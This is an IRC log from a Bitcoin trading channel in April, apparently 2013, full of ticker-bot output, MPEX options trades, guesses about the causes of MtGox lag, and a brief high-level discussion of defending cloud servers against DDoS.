Difficulty: 7672999.920164138 | Next Difficulty At Block: 231839 | Next Difficulty In: 1365 blocks | Next Difficulty In About: 1 week, 0 days, 19 hours, 11 minutes, and 59 seconds | Next Difficulty Estimate: 8983388.21622 | Estimated Percent Change: 17.07791 Apr 09 17:40:04 fyi http://smpake.com/etc/btc/charts.php Apr 09 17:40:12 [MPEX] [S.MPOE] 10125 @ 0.00068861 = 6.9722 BTC [+] Apr 09 17:40:14 [MPEX] [S.MPOE] 9965 @ 0.00070898 = 7.065 BTC [+] Apr 09 17:40:24 [MPEX] [S.MPOE] 6760 @ 0.00071145 = 4.8094 BTC [+] Apr 09 17:40:24 dont you love it when the data craps out Apr 09 17:40:58 we will be CPU mining soon at this rate Apr 09 17:41:20 yeah, I might turn the miner back on Apr 09 17:41:27 got a GH Apr 09 17:42:21 I liked getting woken up to bitcoinity playing a video, and then a message that the next funny gif would be revealed at $1000. Apr 09 17:42:47 6.00 5 minutes ago 218.38 Apr 09 17:42:55 unacceptable Apr 09 17:43:42 i think mtgox is just manipulating price or is using the lag/pause to their advantages to front run etc Apr 09 17:43:45 mkay. strikes up to 500 added Apr 09 17:43:52 :D Apr 09 17:43:52 bot will be quoting on the next tick. Apr 09 17:43:55 lol Apr 09 17:43:56 YES! Apr 09 17:44:06 should I roll the calls over to 400s Apr 09 17:44:12 supervised quoting so trades may be unwound. Apr 09 17:44:16 haha dont be too giddy Apr 09 17:45:01 none of this make sense anymore Apr 09 17:45:08 table formatting is whack Apr 09 17:45:20 btw mircea_popescu we're over 300k now in failed btc loans Apr 09 17:45:24 btc equivalent Apr 09 17:45:29 fiat whatever Apr 09 17:45:43 gox lag has been going for so long without being fixed it's fishy... Apr 09 17:45:47 euphoria is beginning to set in Apr 09 17:45:48 jcpham who's we ? Apr 09 17:45:56 ye pnam Apr 09 17:45:57 more than car, less than house is now more than a house Apr 09 17:45:57 just as bad as panic Apr 09 17:45:58 yep Namworld Apr 09 17:45:59 Namworld seen the last on trilema ? Apr 09 17:46:00 the collective we Apr 09 17:46:10 me myself and i Apr 09 17:46:23 nay Apr 09 17:46:47 i mean you guys can't determine if there ar 6 of us scrambling like monkeys trading Apr 09 17:46:54 the entity you knows as "jcpham" Apr 09 17:47:32 i assume jurov will need a day or two to add these new options to coinbr? Apr 09 17:47:52 stfu. just came and looking on'em Apr 09 17:47:54 i wonder what percent of options expire worthless Apr 09 17:48:06 huh? Apr 09 17:48:21 "IRL" 90% of options expire worthless Apr 09 17:49:04 ThickAsThieves do tell me, why do you think it takes day or two? Apr 09 17:49:11 i have no idea Apr 09 17:49:19 i was just asking a q Apr 09 17:49:31 i'm no programmer Apr 09 17:49:55 unless you count some HTML... Apr 09 17:50:13 are you saying it's much harder or easier than that? Apr 09 17:50:49 O.o even if i hand-inputted sql statement for every mpsic, it would be less than a day Apr 09 17:51:11 word, i thought it was pretty easy, wasnt trying to insult or anything Apr 09 17:51:18 i stil <3 you Apr 09 17:51:38 oh sry i sounded out harsher than i meant to Apr 09 17:51:59 no hard feelings, i was just wtf? Apr 09 17:52:37 :) back to your regularly scheduled programming Apr 09 17:52:45 (pun intended) Apr 09 17:53:09 ;;ticker Apr 09 17:53:10 BTCUSD ticker | Best bid: 218.39000, Best ask: 218.95000, Bid-ask spread: 0.56000, Last trade: 218.39000, 24 hour volume: 107667.08430243, 24 hour low: 172.13000, 24 hour high: 218.38000, 24 hour vwap: 191.89077 Apr 09 17:54:40 jcpham this reminds me of the time george costanza + seinfeld decided they need like 3 of them to make up a guy enouygh to mate. Apr 09 17:57:36 ;;calc 11000000*218 Apr 09 17:57:36 2398000000 Apr 09 17:59:22 Looks like handling the unfunded order book was a source of goxlag... https://mtgox.com/press_release_20130409.html Apr 09 18:00:17 [BTCTC] [ASICMINER-PT] 1 @ 0.7749 BTC [+] Apr 09 18:00:45 i wonder why they are waiting that many days to change it Apr 09 18:01:17 [BTCTC] [ASICMINER-PT] 12 @ 0.775 = 9.3 BTC [+] Apr 09 18:01:45 Bugpowder: LOL Apr 09 18:01:46 mircea_popescu: quick question about DDOS, do you think an EC2 instance is prone to hardware failure in the networking aspect (it is easy to just bring up new instances of the server, but you had said the router is the point of failure) Apr 09 18:01:48 well it was one of the things people said they liked,. Apr 09 18:02:14 MJR_ if you only expose it through their load balancer should be fine in most cases. Apr 09 18:02:41 [BTCTC] [ASICMINER-PT] 4 @ 0.7798 = 3.1192 BTC [+] Apr 09 18:03:30 dont you get to pay the (rather large) bill if you get ddos'ed on ec2? Apr 09 18:03:35 on outgoing traffic obviously Apr 09 18:04:01 mircea_popescu: that is what i was thinking, building out infrastructure now, and that came up...i'm a big fan of having instances running and waiting to be failed over to. Last design issue I wanted to think about is an "airgap" solution for something that is in the cloud... Apr 09 18:04:14 Scrat: DDOS is inbound Apr 09 18:04:29 Scrat: so as long as you don't respond to spam, you should be fine Apr 09 18:05:03 Scrat: but you will incur more costs as you bring up more servers to handle the CPU side of the DDOS, I was mostly worried about the network hardware side Apr 09 18:05:23 All added to coinbr. Apr 09 18:05:24 MJR_: a smart attack targetted against ec2 would pull static assets with legit looking requests Apr 09 18:05:37 thx jurov Apr 09 18:06:16 Scrat: i think btctc.co had an implementation to stop that, force a 3 second + redirect to the actual resource Apr 09 18:06:34 Scrat: or just only allow a certain number of logins per hour per account Apr 09 18:06:36 [MPEX] [O.USD.C272T] 5 @ 0.06780302 = 0.339 BTC Apr 09 18:07:18 ;;calc 272 / .93 Apr 09 18:07:19 292.47311828 Apr 09 18:07:21 heh Apr 09 18:07:30 ;;ticker Apr 09 18:07:32 BTCUSD ticker | Best bid: 217.00000, Best ask: 218.50000, Bid-ask spread: 1.50000, Last trade: 217.00000, 24 hour volume: 107667.08430243, 24 hour low: 172.13000, 24 hour high: 218.38000, 24 hour vwap: 191.89077 Apr 09 18:07:34 Scrat: a million ways to deal with traffic, as long as your router doesn't blow up Apr 09 18:07:55 but forcing them to blow up all of amazon in order to stop you is quite a barrier to entry Apr 09 18:08:26 MJR_: yeah I'm not saying otherwise, but in that case the objective of the attacker is to slap you with a $100k ec2 bill Apr 09 18:08:27 wow mircea_popescu that is a simple formula Apr 09 18:08:55 Scrat: I need to do more research, but it is outgoing that will run up the bill...you can throttle that based on a bunch of heuristics Apr 09 18:09:16 MJR_: it is, incoming traffic is free Apr 09 18:09:31 ;;bc,24hprc Apr 09 18:09:32 191.14 Apr 09 18:09:34 no legit user needs more than 1000 logins per hour...and you only allow legit traffic to pull the resource heavy outgoing data Apr 09 18:10:14 don't need a session id to access say logo and css Apr 09 18:10:19 MJR_, Scrat: I also have request limiter set up, caused regular users to get 503 error till i tuned it up Apr 09 18:10:33 obviously, you can stop non-legit users from creating accounts by having a funding requirement of 1btc etc...too costly to create the accounts, and why would you want to put all your coins into the hands of the guy you're attacking Apr 09 18:11:27 filtering legit users from spam is a lot easier than trying to stop traffic before it hits the router (actually impossible, it'll always hit SOME network device that you need) Apr 09 18:13:27 ;;seen Bugpowder Apr 09 18:13:27 Bugpowder was last seen in #bitcoin-assets 14 minutes and 4 seconds ago: Looks like handling the unfunded order book was a source of goxlag... https://mtgox.com/press_release_20130409.html Apr 09 18:15:24 I sold Apr 09 18:15:44 cant be dealing with this laggy exchange Apr 09 18:16:05 ;;goxlag Apr 09 18:16:06 MtGox lag is 198.983512 seconds. During this time, light travels 0.398760730118 AU. You could have sent a bitcoin from the Sun to Mercury (0.39 AU). Apr 09 18:16:09 heh Apr 09 18:16:48 taub: quantify sold Apr 09 18:16:50 kakobrekla http://jezus.si/graf/dashboards/bitcoin/details/lag/ how come nothing on last 2 gfx ? Apr 09 18:17:44 started logging less than a week ago Apr 09 18:17:58 well worse than the time lag is the fact that no data stream is working no way to see the order book and trades Apr 09 18:17:59 oh jesus bidwall Apr 09 18:18:00 but look at the dates Apr 09 18:18:07 4/03 you have data on some gfx not on others Apr 09 18:18:17 ThickAsThieves: whenever there's a rally payments stop :'( Apr 09 18:18:20 just cashed a bit more on fastcash Apr 09 18:18:29 dunno im guessing it will show up by itself Apr 09 18:18:33 should have locked it and waited to see if there was a dip Apr 09 18:19:10 ill see whats up with that if it doesnt Apr 09 18:19:21 whats the point of the 1mo chart now anyway Apr 09 18:19:25 where is the cancel button on Bitcoin-QT/ Apr 09 18:19:29 if even a week is not full Apr 09 18:20:17 not out of need, but since data should have been plotting and isn't i thought worth the mention Apr 09 18:21:33 bug, where do you cash out? Apr 09 18:21:41 fastcash4bitcoins.com Apr 09 18:21:47 thx Apr 09 18:22:21 they pay under market, but its fast and easy and run by someone with a clue. Apr 09 18:23:48 ;;goxlag Apr 09 18:23:49 MtGox lag is 327.08457 seconds. During this time, light travels 0.655473816059 AU. You could have sent a bitcoin from the Sun to Venus (0.72 AU). Apr 09 18:23:53 \o/ Apr 09 18:26:12 yeah its true mircea_popescu, something is acting up Apr 09 18:26:16 jesus... $14.1MM Apr 09 18:26:23 AND ITS NOT BITCOIN! Apr 09 18:27:51 222.22 USD / BTC Apr 09 18:30:02 nom nom nom Apr 09 18:30:37 "Bitcoin is a tax on people who are bad at Byzantine fault tolerance." Apr 09 18:30:57 and i thought it will abandon the parabolic(or even exponential) rise.. not yet Apr 09 18:34:14 meanwhile in gold, http://bullmarketthinking.com/comex-gold-inventories-collapse-by-largest-amount-on-record/ Apr 09 18:34:34 [MPEX] [O.USD.C296T] 100 @ 0.05114951 = 5.115 BTC Apr 09 18:35:44 that gox press release was just as I suspected... doing some sort of recursive credit check for unfunded orders... Apr 09 18:36:38 what'd be recursive about it ? Apr 09 18:37:05 >Greece is considering slapping a .162 billion invoice on Germany as compensation for the Second World War. Apr 09 18:37:08 lmao Apr 09 18:37:11 pgp: I doubt thats the culprit. that would allow anyone to turn captchas into gox lag Apr 09 18:37:21 surprisingly stupid Apr 09 18:37:29 Scrat they've done surprisingly stupid shit before. Apr 09 18:37:30 162b eur that is Apr 09 18:37:43 Do you have funds to fund the order? Yes. Do you have funds to fund the funds to fund the order? Yes. Repeat process 1 billion time on each order. Apr 09 18:37:48 You get gox lag. Apr 09 18:37:53 eh that' Apr 09 18:37:55 s not how it works Apr 09 18:38:05 just have a process move order to active when funds clear Apr 09 18:38:31 [BTCTC] [ASICMINER-PT] 1 @ 0.775 BTC [-] Apr 09 18:38:38 lag is not how it's supposed to work either. They must be doing something wrong somewhere... Apr 09 18:38:44 [BTCTC] [ASICMINER-PT] 2 @ 0.7605 = 1.521 BTC [-] Apr 09 18:38:48 then again considering the string of insanities sturles was sprouting the other day, it wouldn't surprise me if they run it like that. Apr 09 18:38:48 [MPEX] [O.USD.C194T] 9 @ 0.20098104 = 1.8088 BTC Apr 09 18:38:50 [BTCTC] [ASICMINER-PT] 1 @ 0.7601 BTC [-] Apr 09 18:38:52 [BTCTC] [ASICMINER-PT] 1 @ 0.76 BTC [-] Apr 09 18:38:56 [BTCTC] [ASICMINER-PT] 1 @ 0.75902 BTC [-] Apr 09 18:38:58 [BTCTC] [ASICMINER-PT] 1 @ 0.75901 BTC [-] Apr 09 18:39:01 [BTCTC] [ASICMINER-PT] 1 @ 0.75501 BTC [-] Apr 09 18:39:03 [BTCTC] [ASICMINER-PT] 5 @ 0.755 = 3.775 BTC [-] Apr 09 18:39:06 [BTCTC] [ASICMINER-PT] 7 @ 0.753 = 5.271 BTC [-] Apr 09 18:39:08 [BTCTC] [ASICMINER-PT] 1 @ 0.751 BTC [-] Apr 09 18:39:11 [BTCTC] [ASICMINER-PT] 1 @ 0.751 BTC [-] Apr 09 18:39:14 [BTCTC] [ASICMINER-PT] 15 @ 0.7503 = 11.2545 BTC [-] Apr 09 18:39:17 [BTCTC] [ASICMINER-PT] 7 @ 0.75 = 5.25 BTC [-] Apr 09 18:39:19 [BTCTC] [ASICMINER-PT] 1 @ 0.74002 BTC [-] Apr 09 18:39:22 [BTCTC] [ASICMINER-PT] 12 @ 0.74001 = 8.8801 BTC [-] Apr 09 18:39:25 [BTCTC] [ASICMINER-PT] 1 @ 0.740003 BTC [-] Apr 09 18:39:28 [BTCTC] [ASICMINER-PT] 25 @ 0.740001 = 18.5 BTC [-] Apr 09 18:39:37 assbot Apr 09 18:39:38 stahp Apr 09 18:39:46 lol it worked Apr 09 18:40:08 [BTCTC] [ASICMINER-PT] 2 @ 0.7391 = 1.4782 BTC [-] Apr 09 18:40:12 lol Apr 09 18:40:17 $14.6MM Apr 09 18:41:19 ;;bids 0 Apr 09 18:41:23 There are currently 32321686 bitcoins demanded at or over 0.0 USD, worth 14630014.4001 USD in total. | Data vintage: 57.1659 seconds Apr 09 18:41:25 wow Apr 09 18:41:51 I think the number needs to go up to support the current price though Apr 09 18:41:53 that's the same 12 million amplified by the new exchange value Apr 09 18:41:56 let's say that I have funded buys and sell in gox and unfunded buys and sell, doesn't an execution on one side force them to check all the orders on the other side for same person? Apr 09 18:42:01 the walls need to be higher Apr 09 18:42:14 errr, at a higher value Apr 09 18:43:04 not really recursive, but a shitload required checking with every order and execution... Apr 09 18:43:09 !ticker m ^oix Apr 09 18:43:11 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 110.64241833 / 147.74091471 / 182.77959828 (19650 shares, 4,629.08 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 09 18:43:14 no? Apr 09 18:44:29 accrding to oix, practically all calls are deep in the money... feels sorry for bondholders Apr 09 18:44:53 pgp why the fuck check ? Apr 09 18:45:03 seems i can completely close MPBPT :( Apr 09 18:45:08 question: with fastcash4bitcoins.com, isn't there an arb on that 15 min window when volatility is high? kinda like a free put? Apr 09 18:45:12 keep a process on the clearing side, just move things in the active bnook as funds clear Apr 09 18:46:38 mircea_popescu: as a representative of bondholders i request you to increase price on calls Apr 09 18:46:58 lol Apr 09 18:46:58 lol Apr 09 18:47:00 mp: I agree they shouldn't, but if their system is built around the idea of allowing unfunded order to be promoted to funded orders, that would occur no just when money comed in or out, but for those making two sided markets as well... Apr 09 18:47:08 :) Apr 09 18:47:21 pgp i still don't see what changes. when money comes in order is moved into active. Apr 09 18:47:25 there's nothing to check. Apr 09 18:47:27 pgp yes, though during high volatility the price gap increases Apr 09 18:47:42 its tough to beat him. Apr 09 18:47:59 i see - you've tried, then? Apr 09 18:48:16 yeah a little. Apr 09 18:48:20 my friend is more anal about it Apr 09 18:48:33 why not do something useful, rather than try and squeeze pennies out of a service Apr 09 18:49:21 I don't... just was reading their t&c's... Apr 09 18:50:04 [HAVELOCK] [SDICE] 2 @ 0.25 = 0.5 BTC [-] Apr 09 18:50:35 ;;calc 215/(1-0.087) Apr 09 18:50:38 235.487404162 Apr 09 18:51:03 holdy fucking bidwall Apr 09 18:51:03 ^ mircea_popescu, but im serious. C215T may be in the money tomorrow as it looks Apr 09 18:51:09 [MPEX] [O.USD.C248T] 100 @ 0.10431071 = 10.4311 BTC Apr 09 18:51:09 ;;bids 0 Apr 09 18:51:11 There are currently 32320610 bitcoins demanded at or over 0.0 USD, worth 16067341.6473 USD in total. | Data vintage: 53.9271 seconds Apr 09 18:51:22 holy crap 16 il Apr 09 18:51:24 C300T will be ITM tomorrow Apr 09 18:51:27 well sure it may be in the money. Apr 09 18:51:39 if calls couldn't make moneuy nobody would buy them Apr 09 18:51:52 MPOE is exposing itself to undue risk, don't you think? Apr 09 18:52:15 bot should also BUY calls Apr 09 18:52:34 at a higher price Apr 09 18:52:52 I recommend 0.8 for the C137Ts. Apr 09 18:53:01 [MPEX] [O.USD.P200T] 1000 @ 0.15267922 = 152.6792 BTC [-] Apr 09 18:53:06 [MPEX] [O.USD.C215T] 30 @ 0.15955155 = 4.7865 BTC Apr 09 18:53:15 lolwut Apr 09 18:53:29 mp: regardng gox. If I have a funded buy order and an unfunded sell order for same amount and yet another unfunded buy order unde my funded buy order, then when first buy order gets triggered then sell order now becomes funded, no? and when sell gets executed the second buy order now become funded.... Apr 09 18:53:36 o, wall Apr 09 18:53:36 http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Apr 09 18:53:37 jurov the risk is this : if price goes up, short calls lose money. if price goes down, they make money. Apr 09 18:53:40 what's unde about that ? Apr 09 18:54:10 pgp so what, have trade engine check with clearing ? Apr 09 18:54:11 how many short calls are there, not many i daresay. Apr 09 18:54:16 one'd have to be retarded to be like that. Apr 09 18:54:27 jurov all calls the bot sells are short to the bot. Apr 09 18:55:59 ;;ticker Apr 09 18:56:01 BTCUSD ticker | Best bid: 222.50000, Best ask: 223.00000, Bid-ask spread: 0.50000, Last trade: 223.00000, 24 hour volume: 111105.23170259, 24 hour low: 172.13000, 24 hour high: 223.76000, 24 hour vwap: 194.02951 Apr 09 18:56:08 mp: agreed gox is retarded - i'll bet that there system does funding check on every execution - it explains a lot and is consistent with their press release... Apr 09 18:56:32 this is what you get when geeks get involved in software design. Apr 09 18:56:35 an alternative explanation is that they run their matching engine on a commodore 64 Apr 09 18:56:49 [MPEX] [O.USD.C248T] 10 @ 0.10489348 = 1.0489 BTC [+] Apr 09 18:57:08 no surprise there Apr 09 18:58:15 ;;ticker Apr 09 18:58:15 !ticker m ^oix Apr 09 18:58:16 BTCUSD ticker | Best bid: 222.50000, Best ask: 223.00000, Bid-ask spread: 0.50000, Last trade: 223.00000, 24 hour volume: 111105.23170259, 24 hour low: 172.13000, 24 hour high: 223.76000, 24 hour vwap: 194.02951 Apr 09 18:58:16 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 110.64241833 / 148.3968512 / 183.81305704 (19790 shares, 4,645.34 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 09 18:59:04 [HAVELOCK] [HIM] 2 @ 1.548 = 3.096 BTC [-] Apr 09 19:00:56 jurov all calls the bot sells are short to the bot. <<< and thus to bondholders Apr 09 19:01:02 yeah. Apr 09 19:01:50 [MPEX] [S.MPOE] 29349 @ 0.00069022 = 20.2573 BTC [-] Apr 09 19:01:52 [MPEX] [S.MPOE] 10200 @ 0.00070222 = 7.1626 BTC [+] Apr 09 19:01:53 i mean, isn't it so unreasonable to assume March will possibly repeat, and do valuation adjustment? Apr 09 19:02:04 why am i assuming ? Apr 09 19:02:39 what you're assuming then? Apr 09 19:02:43 nothing. Apr 09 19:03:16 if we knew wtf is ghoing on we wouldn't need optioons in the fuirst place Apr 09 19:03:27 two months in a row loss for MPOE bonds will cause having to cover them all yourself, can't we at least assume that as a baseline? Apr 09 19:03:46 or are you sure this is very unlikely? Apr 09 19:03:53 im not sure of anything tbh. Apr 09 19:05:29 what are you so aggitated about anyway, the oix is half puts Apr 09 19:05:34 [BTCTC] [ASICMINER-PT] 2 @ 0.779 = 1.558 BTC [+] Apr 09 19:06:18 [BTCTC] [ESECURITYSABTC] 1 @ 0.2 BTC [-] Apr 09 19:07:26 i'm agitated about the call part of oix :) Apr 09 19:08:15 jurov, it seems you are questioning mp for bonds you bought knowing the same trend already Apr 09 19:08:17 no? Apr 09 19:08:26 ya but if you think about it, if options sold are half put half call by volume... what's gonna happen ? Apr 09 19:08:30 they can't both win Apr 09 19:09:04 [HAVELOCK] [HIM] 10 @ 1.54 = 15.4 BTC [-] Apr 09 19:09:21 and remember because it's $ profits as calls move more and more into the money they have a built in profit limiter. Apr 09 19:09:50 i didn't put much into bonds myself. but i'm being MPBPT operator here Apr 09 19:10:04 and MPBPT May is not selling at all Apr 09 19:10:05 [MPEX] [O.USD.P200T] 1000 @ 0.15160246 = 151.6025 BTC [-] Apr 09 19:10:28 i'm surprised APR sold Apr 09 19:10:31 the premium asked by the bot is already MUCH larger Apr 09 19:12:00 The tide will change though Apr 09 19:14:35 options sold are half put half call by volume, really? then it's okay, should have researched it before freaking out. Apr 09 19:15:47 ;;bids 0 Apr 09 19:15:49 There are currently 32320703 bitcoins demanded at or over 0.0 USD, worth 15982219.3621 USD in total. | Data vintage: 0.0107 seconds Apr 09 19:16:01 16 million? fuck me Apr 09 19:16:03 Freaking out will only lead to impedements ; Apr 09 19:16:25 we might hit 300 this week Apr 09 19:16:33 asks 99999999999 Apr 09 19:16:44 jurov well it's what mpex.co main page says Apr 09 19:16:46 ;;asks 99999999999 Apr 09 19:16:46 There are currently 33949.898 bitcoins offered at or under 99999999999.0 USD, worth 124147627774.0 USD in total. | Data vintage: 56.7975 seconds Apr 09 19:17:01 wow Apr 09 19:17:08 someone lit the fuse on the rocket a few weeks back Apr 09 19:17:15 i think it has 2 months of fuel left at least Apr 09 19:17:19 but that's me Apr 09 19:17:20 its just now going into hyperdrive Apr 09 19:17:44 225 getting interesting Apr 09 19:18:02 500 tomorrow would be epicly interesting Apr 09 19:18:12 hah no way :) Apr 09 19:18:14 but that's more like next week Apr 09 19:18:28 ;;bids 0 Apr 09 19:18:29 There are currently 32320982 bitcoins demanded at or over 0.0 USD, worth 15996422.2562 USD in total. | Data vintage: 12.3289 seconds Apr 09 19:18:38 the market cap did just double in about 9 days Apr 09 19:18:41 ;;ticker Apr 09 19:18:41 ;;ticker Apr 09 19:18:42 BTCUSD ticker | Best bid: 224.00000, Best ask: 224.48980, Bid-ask spread: 0.48980, Last trade: 224.48980, 24 hour volume: 109285.52746947, 24 hour low: 172.13000, 24 hour high: 224.70000, 24 hour vwap: 195.30955 Apr 09 19:18:42 if no one was paying attention Apr 09 19:18:43 BTCUSD ticker | Best bid: 224.00000, Best ask: 224.48980, Bid-ask spread: 0.48980, Last trade: 224.48980, 24 hour volume: 109285.52746947, 24 hour low: 172.13000, 24 hour high: 224.70000, 24 hour vwap: 195.30955 Apr 09 19:18:56 225? Apr 09 19:18:58 [MPEX] [S.MPOE] 2000 @ 0.0007035 = 1.407 BTC [+] Apr 09 19:18:58 mp/jurov could you flush deposits? Apr 09 19:19:16 and 500 is too much, over 1005 jump could happen but it would take a while to get a new ath Apr 09 19:19:24 a while being 4 days or so, lol Apr 09 19:19:25 ;;asks 250 Apr 09 19:19:26 There are currently 5912.9431 bitcoins offered at or under 250.0 USD, worth 1410255.58397 USD in total. | Data vintage: 69.2906 seconds Apr 09 19:19:39 ;;aks 500 Apr 09 19:19:40 Error: "aks" is not a valid command. Apr 09 19:19:41 ;;bids 200 Apr 09 19:19:42 There are currently 20728.936 bitcoins demanded at or over 200.0 USD, worth 4370048.45664 USD in total. | Data vintage: 85.1904 seconds Apr 09 19:19:47 ;;asks 500 Apr 09 19:19:47 There are currently 16400.756 bitcoins offered at or under 500.0 USD, worth 4935155.15891 USD in total. | Data vintage: 90.9606 seconds Apr 09 19:19:56 [MPEX] [O.USD.C047T] 4 @ 0.76327969 = 3.0531 BTC [+] Apr 09 19:19:58 5 million to 500 Apr 09 19:20:04 not yet, i just sent some deposits over to mpex Apr 09 19:20:12 but the day traders... Apr 09 19:20:13 I wonder when we'll be at the "IT'S OVER 9000!!!" point... with everyone repeating that of course. Apr 09 19:20:15 Until recently, anyone could place a buy or sell order for Bitcoin, regardless of how much funds were actually available in their wallet, resulting in an order showing a "Not enough funds" error status in the Open Orders list. Apr 09 19:20:19 Starting on April 17th, this counter productive scenario will no longer be possible and will be automatically rejected before validating your order; until you have enough funds in your wallet to match the order value. Apr 09 19:20:22 Certainly not during this rally Apr 09 19:20:23 i called it Apr 09 19:20:25 so called it Apr 09 19:20:26 how are my calls looking 218 and im in the money, fuck yeah Apr 09 19:20:31 Maybe in a few years tho Apr 09 19:20:32 that's whats causing the lag Apr 09 19:20:33 and we still ahve weeks to go, lol Apr 09 19:21:05 [HAVELOCK] [HIM] 1 @ 1.53000001 BTC [-] Apr 09 19:21:16 btw if someone is funding coinbr with large sum and i'm around, ask me for direct deposit to mpex Apr 09 19:21:31 If I had been putting ALL my money in calls each month since the beggining I'd probably have like 20k BTC by now or something >.> Apr 09 19:21:41 or nothing. Apr 09 19:21:44 225 Apr 09 19:21:47 or nothing =P Apr 09 19:21:52 for real this time Apr 09 19:21:57 Which is exactly why I didn't buy... Apr 09 19:21:57 will do jurov Apr 09 19:22:13 of course if people knew it wasn't going to crash during the month, people would buy more of them Apr 09 19:22:16 i have a 2nd large deposit already going to you tho Apr 09 19:22:24 whatever happened to that dude was going to short mpoe last ? Apr 09 19:25:05 [HAVELOCK] [VTX] 24 @ 0.21 = 5.04 BTC [+] Apr 09 19:26:09 [MPEX] [O.USD.C212N] 4 @ 0.39140833 = 1.5656 BTC Apr 09 19:27:04 ;;goxlag Apr 09 19:27:05 MtGox lag is 121.32087 seconds. During this time, light travels 0.243125665104 AU. You could have sent a bitcoin between Earth and Venus at their closest approach (0.254 AU). Apr 09 19:28:05 [HAVELOCK] [SDICE] 4 @ 0.2222225 = 0.8889 BTC [-] Apr 09 19:28:23 taub, mtgox is changing their order system on the 17th? Apr 09 19:28:26 anyone shorting anything in bitcoinland is probably burned Apr 09 19:28:36 [MPEX] [O.USD.C320N] 1 @ 0.24445838 BTC Apr 09 19:29:03 [HAVELOCK] [SDICE] 3 @ 0.2222 = 0.6666 BTC [-] Apr 09 19:29:05 [HAVELOCK] [SDICE] 6 @ 0.2222 = 1.3332 BTC [-] Apr 09 19:29:18 ;;bc,stats Apr 09 19:29:21 Current Blocks: 230487 | Current Difficulty: 7672999.920164138 | Next Difficulty At Block: 231839 | Next Difficulty In: 1352 blocks | Next Difficulty In About: 1 week, 0 days, 19 hours, 33 minutes, and 38 seconds | Next Difficulty Estimate: 8970854.58548 | Estimated Percent Change: 16.91457 Apr 09 19:29:36 [MPEX] [S.MPOE] 5900 @ 0.00070866 = 4.1811 BTC [+] Apr 09 19:29:38 [MPEX] [S.MPOE] 9333 @ 0.00071 = 6.6264 BTC [+] Apr 09 19:30:05 [HAVELOCK] [SDICE] 3 @ 0.221 = 0.663 BTC [-] Apr 09 19:30:45 ;;seen Bugpowder Apr 09 19:30:46 Bugpowder was last seen in #bitcoin-assets 37 minutes and 53 seconds ago: I recommend 0.8 for the C137Ts. Apr 09 19:31:04 [HAVELOCK] [KCIM] 1 @ 1.06600001 BTC [-] Apr 09 19:31:09 Bugpowder: did you push to smickles? Apr 09 19:32:03 [HAVELOCK] [SDICE] 6 @ 0.22 = 1.32 BTC [-] Apr 09 19:33:05 [HAVELOCK] [VTX] 24 @ 0.21 = 5.04 BTC [+] Apr 09 19:33:21 !t m s.dice Apr 09 19:33:23 [MPEX:S.DICE] 1D: 0.0027 / 0.00276292 / 0.00333327 (51603 shares, 142.58 BTC), 7D: 0.0027 / 0.00309136 / 0.00400173 (503326 shares, 1,555.97 BTC), 30D: 0.0027 / 0.00361436 / 0.006 (1689030 shares, 6,104.77 BTC) Apr 09 19:34:04 ;;quotes Apr 09 19:34:04 Error: "quotes" is not a valid command. Apr 09 19:34:40 ;;ticker Apr 09 19:34:41 BTCUSD ticker | Best bid: 227.00000, Best ask: 227.85990, Bid-ask spread: 0.85990, Last trade: 227.85990, 24 hour volume: 109285.52746947, 24 hour low: 172.13000, 24 hour high: 224.70000, 24 hour vwap: 195.30955 Apr 09 19:35:45 $avg Apr 09 19:35:56 thestringpuller: An error has occurred and has been logged. Please contact this bot's administrator for more information. Apr 09 19:35:59 ;;bc,24hprc Apr 09 19:36:03 ugh Apr 09 19:36:04 197.23 Apr 09 19:36:13 oh Apr 09 19:39:05 [BTCTC] [ASICMINER-PT] 2 @ 0.741 = 1.482 BTC [-] Apr 09 19:39:20 [MPEX] [O.USD.C104T] 120 @ 0.47411495 = 56.8938 BTC [+] Apr 09 19:39:36 [MPEX] [O.USD.C104T] 10 @ 0.47411495 = 4.7411 BTC [+] Apr 09 19:40:06 [MPEX] [O.USD.C302T] 1000 @ 0.06147506 = 61.4751 BTC Apr 09 19:41:40 "i short btc @ 35$" poor poor guy Apr 09 19:41:44 [MPEX] [O.USD.C305T] 100 @ 0.05949934 = 5.9499 BTC Apr 09 19:41:49 worst timing EVER Apr 09 19:41:53 [BTCTC] [BTC-TRADING-PT] 1 @ 0.13928 BTC [-] Apr 09 19:42:31 [BTCTC] [LTC-MINING] 1 @ 0.24 BTC [-] Apr 09 19:43:29 buy ask walls on bitcoinity dont match actual orderbook (as compared with clarkmoody) Apr 09 19:43:42 shows a huge 8k btc wall at 212.13 that isnt in the order books Apr 09 19:44:18 oh wait Apr 09 19:44:22 found it in the order books Apr 09 19:44:37 212.11 for 9k btc Apr 09 19:45:03 thats a $2million order Apr 09 19:45:13 bid Apr 09 19:45:30 heh Apr 09 19:45:35 two clicks iof the button Apr 09 19:46:22 ;;bc,24hprc Apr 09 19:46:23 Error: Failed to retrieve data. Try again later. Apr 09 19:47:05 [HAVELOCK] [SDICE] 2 @ 0.22000001 = 0.44 BTC [+] Apr 09 19:47:17 !ticker m s.mpoe Apr 09 19:47:18 [MPEX:S.MPOE] 1D: 0.00065356 / 0.00068704 / 0.00071145 (560512 shares, 385.10 BTC), 7D: 0.00063322 / 0.00068728 / 0.00071514 (2019787 shares, 1,388.17 BTC), 30D: 0.00059218 / 0.00068919 / 0.00077505 (9481307 shares, 6,534.43 BTC) Apr 09 19:49:06 [BTCTC] [COGNITIVE] 165 @ 0.11711 = 19.3232 BTC [-] Apr 09 19:49:55 ;;ticker Apr 09 19:49:56 BTCUSD ticker | Best bid: 225.00000, Best ask: 225.99999, Bid-ask spread: 0.99999, Last trade: 225.99999, 24 hour volume: 102831.28291584, 24 hour low: 178.00100, 24 hour high: 227.86018, 24 hour vwap: 198.06245 Apr 09 19:51:18 Will one of you whales crash this thing already? This is absurd. Apr 09 19:52:32 Just put some low strike options for sale under bot prices, if anyone is interested Apr 09 19:52:55 86s thru 122s Apr 09 19:54:09 how come i don't see them ?! Apr 09 19:54:13 TomServo: the wales are pumping it still Apr 09 19:56:11 coinbr says "queued" Apr 09 19:56:12 i doubt a whale could crash it either. the best you could hope for is a ddos :P Apr 09 19:56:20 :/ Apr 09 19:57:16 ;;sell 50000 Apr 09 19:57:17 